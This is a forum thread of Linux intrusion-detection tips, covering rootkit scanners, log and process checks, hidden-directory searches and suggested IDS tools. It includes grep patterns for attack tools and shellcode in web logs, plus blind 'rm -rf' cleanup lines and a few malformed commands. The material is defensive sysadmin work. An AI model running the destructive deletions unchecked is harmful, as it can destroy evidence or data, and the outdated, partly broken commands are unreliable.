Advise: this are steps recompiled from the network and a from some books, these were not done by me.

Hello..

I have a few incomplete steps to see if I got some intruder in my Linux system.. But i really would like to have all your suggestions to make a good doc about this matter, so please, post your tips and tricks about this subject.

1.- Download and run Rkhunter & Chkrootkit
2.- Run "w", and "netstat -nalp |grep ":SSHPORTHERE" to see whos connected using SSH
3.- Search for ssh and ftp accepted logins.

last
cat /var/log/secure* | grep ssh | grep Accept
cat /var/log/secure* |grep ftp |grep Accept
less /var/log/messages | grep ftp
4.- Watch current connections and scan your ports.


netstat -nalp
nmap 1-65535 localhost
5.- Search for suspicious content on common explotable dirs.


rm -rf /tmp/sess*
rm -rf /var/dos-*
rm -rf /var/tmp/ssh-*
rm -rf /var/tmp/dos-*
ls /tmp -lab
ls /var/tmp -labR
ls /dev/shm -labR
ls /usr/local/apache/proxy -labR
ls /usr/local/samba -labR
6.- Checking for anomalies on this files.

less /etc/passwd
less /etc/shadow
less /etc/groups
7.- Search for new users at sudoers, check wtmp and telnet is not running.


cat /etc/sudoers
who /var/log/wtmp
cat /etc/xinetd.d/telnet
8.- Find bash history files


find '/' -iname .bash_history
9 .- Verify the Crontab table


crontab -l
10 .- Update the slocate database and search for exploits.


updatedb &
For cPanel servers:

egrep -i '(chr\(|system\()|(curl|wget|chmod|gcc|perl)%20' /usr/local/apache/logs/*
egrep -i '(chr\(|system\()|(curl|wget|chmod|gcc|perl)%20' /home/*/statistics/logs/*
For Ensim servers:

egrep -i '(chr\(|system\()|(curl|wget|chmod|gcc|perl)%20'/home/virtual/site*/fst/var/log/httpd/*
Search for shell code:


cat /path/of/your/web/logs/* |grep "/x90/"
11.- Search for hidden dirs


locate "..."
locate ".. "
rlocate " .."
locate ". "
locate " ."
12.- Search for perl-scripts running


ps -aux | grep perl
13 .- Checking nobody user and open files.


service httpd stop
lsof -u nobody


Please, add your tips and tricks about this.

Dude, rock'n thread. That was the single most useful thing I've read & as a relative linux noob with security issues, I have had to do a lot of Google'n.

Beauty work. Really. Pretty much what every noob to linux security & bash needs to know to have any sort of "ability" to counter hackers. The bash_history bit was the best. So damn useful.

Glad to hear that.

Here there is another tip to track exploits in temp dirs, its a bash script:


#!/bin/bash
for x in "/dev/shm /tmp /usr/local/apache/proxy /var/spool /var/tmp"; do ls -loAFR $x 2>&- | grep -E "^$|^/| apache | nobody | unknown | www | web " | grep -E "^$|^/|/$|\*$|\.pl$" | tee exploits.txt; done; echo -e "\n\nPossible Exploit Files and Directories: `grep -Ev "^$|^/" exploits.txt | wc -l | tr -d ' '`" | tee -a exploits.txt


I also hope to have the experts of this forum posting their rules to track hackers.

Also try this - ossec.net

Cool.., i will test this .

Any other suggestions ?

Thanks

rm -rf /tmp/sess*


alot of times attackers will save their files to look similar to session files.

Oh.. thanks, i will correct that.

nice i will put this to use, lol u did a good job at explaining this.

This is an excellent thread. Bookmarked this one.

Thanks, this is very useful :)

great info! thanks

How would you compare OSSEC to Osiris?

thanks man.

cat /path/of/your/web/logs/* |grep "/x90/"

What does this thing do?

Is there a script to search my whole server to see if there is a shell file?

This is outdated...
This can be easily bypassed using asm or binary lol.....

thanks! good info!

Thanks for such informative thread...It will help many of us :)

Good job:agree:

Is there anything that automates doing this on a regular basis & put it off-server (e.g., emails it out)? My fear would be a good cracker would know to remove their tracks, hence performing these steps a day or so later, nothing would turn up.

You can always write a shell script and sent results by mail, and believe me, a good cracker already knows about all this stuff.

This is kinda of old

This is kinda of old

But, still useful. Glad to have seen it once it got popped to the top of the reading list.

thanks man.

cat /path/of/your/web/logs/* |grep "/x90/"

What does this thing do?

Is there a script to search my whole server to see if there is a shell file?

This might be an old post but... That line searches files for shell code. Shell code doesn't have anything to do with the Linux shell. It's machine code that an attacker attempts to execute on your server by using scripts or applications called "exploits". Basically, an exploit will attempt to (ab)use a vulnerability in an application (ie: a buffer overflow vulnerability) to inject shell code (ie: code that listens on a port and binds a Linux command line to it) which is then executed by the CPU. For more information I recommend searching Google for the article "Smashing the stack for fun and profit". It's heavy literature for newbies but it's worth reading.

About the OP: Most of the techniques explained above are really basic and will only detect possible attacks by 'newbie script kiddies'. I recommend installing an advanced IDS such as Snort or TripWire. If you're running cPanel, install ConfigServer Firewall since its LFD tool will monitor a lot of things on your server and send you notifications via email if it detects something that you might want to look into. For those who do not use cPanel: Use LSM and BFD from R-fx Networks.

Off course, the best way is to focus on intrusion prevention/avoidance and not only intrusion detection. ;)

What is LSM?

BFD = Brute force detection on APF firewall, correct?

Thank you for posting this, guys!

I found a slew of files in a ". " directory. I was able to delete the files but I don't know how to get rid of the directory itself. I tried rm -rf and placing the location in quotations but it still shows up and won't go away?

I also found an IRC perl connection open on my server which goes along with the ". " directory contents I found. Man what a headache!!!

What is LSM?

BFD = Brute force detection on APF firewall, correct?

Correct. LSM = Linux Socket Monitor.

Thank you for posting this, guys!

I found a slew of files in a ". " directory. I was able to delete the files but I don't know how to get rid of the directory itself. I tried rm -rf and placing the location in quotations but it still shows up and won't go away?

I also found an IRC perl connection open on my server which goes along with the ". " directory contents I found. Man what a headache!!!

Maybe it's not a space but a hidden ALT+0160 character? Just guessing.

Is there anything that automates doing this on a regular basis & put it off-server (e.g., emails it out)? My fear would be a good cracker would know to remove their tracks, hence performing these steps a day or so later, nothing would turn up.

This is generally why you log to a secure syslog server.

i should try this, look very simple but useful, thanks

Thanks for this, it is very simple yet extremely effective!!!

Maybe is OSSEC much better to find at someone was in your System.